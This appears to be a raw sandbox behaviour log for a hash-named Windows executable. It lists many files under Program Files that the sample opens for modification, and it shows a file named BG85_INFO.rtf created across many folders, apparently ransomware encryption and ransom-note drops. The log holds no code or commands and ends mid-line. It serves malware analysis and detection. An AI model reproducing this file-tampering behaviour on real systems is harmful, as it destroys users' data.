c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\license.html c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Juneau c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Pohnpei c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\gl\LC_MESSAGES\vlc.mo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\de\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\sql70.xsl c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+12 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Bangkok c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.swt_0.12.100.v20140530-1436.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Sao_Paulo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\MST7MDT c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaBrightItalic.ttf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF\ECLIPSE_.RSA c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Rio_Branco c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Dubai c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Jakarta c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Srednekolymsk c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\lua\http\js\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\jfr\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Yellowknife c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.text_3.5.300.v20130515-1451.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\SPPlugins\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Eucla c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\new-trigger-wiz.gif c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Singapore c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Tallinn c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Chita c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\about.html c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\ca\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\tnameserv.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Montevideo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Nipigon c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Luxembourg c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winClassicHandle.png c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\hi\LC_MESSAGES\vlc.mo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-multiview.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\RepairEdit.temp c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ms\LC_MESSAGES\vlc.mo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Yellowknife c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Guayaquil c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\MANIFEST.MF c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-multitabs.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-application-views_ja.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jre7\lib\amd64\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\triggerEvaluators.exsd c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Panama c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\default_apps\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\e4-dark_partstyle.css c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-progress-ui.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-coredump_ja.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Swift_Current c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\3difr.x3d c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\feature.properties c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director.nl_zh_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\Workflow.VisualBasic.Targets c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Antarctica\Palmer c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\New_York c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\tl\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Istanbul c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Rarotonga c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host_zh_CN.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\VisualElements\SmallLogo.png c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Majuro c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\VDK10.SYX c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\ko\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.service.exsd c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator_1.1.0.v20131217-1203.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Noronha c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Merida c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\META-INF\ECLIPSE_.RSA c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\Back-48.png c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\eu\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\lv\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Tehran c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.services.nl_ja_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\org-openide-util-lookup_ja.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\lua\http\dialogs\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\MEIPreload\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AppConfigInternal.zip c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\THIRDPARTYLICENSEREADME-JAVAFX.txt c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\fi\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Regina c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.bindings.nl_zh_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\nbexec.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\dragHandle.png c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Microsoft Sync Framework\v1.0\Runtime\x64\resources\1033\Synchronization.rll c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\zu\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaBrightDemiBold.ttf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.attach.zh_CN_5.5.0.165303.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.metadataprovider.exsd c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\plugins\access\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Antarctica\Troll c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\brx\LC_MESSAGES\vlc.mo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-execution.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-options.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler_ja.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-settings_ja.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Adelaide c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ka\LC_MESSAGES\vlc.mo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Windows Journal\Templates\Month_Calendar.jtp c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\Vdk10.lng c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jabswitch.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Davis c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Thule c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateHelper.msi c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.views.nl_zh_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-uihandler_ja.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_de_DE.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\South_Georgia c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.win32.nl_ja_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_zh_CN.properties c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\cmm\sRGB.pf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Glace_Bay c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Montreal c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Darwin c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\policytool.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Martinique c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-heapdump_ja.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.syntheticnotification.exsd c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.emf.ecore.change_2.10.0.v20140901-1043.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-attach_zh_CN.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Moncton c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\mobile.html c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\dblook.bat c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\THIRDPARTYLICENSEREADME-JAVAFX.txt c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\VisualElements\LogoCanary.png c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.mbeanbrowser.zh_CN_5.5.0.165303.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ko\LC_MESSAGES\vlc.mo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\mk\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ql.nl_ja_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-10 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\San_Juan c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Antarctica\Davis c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program 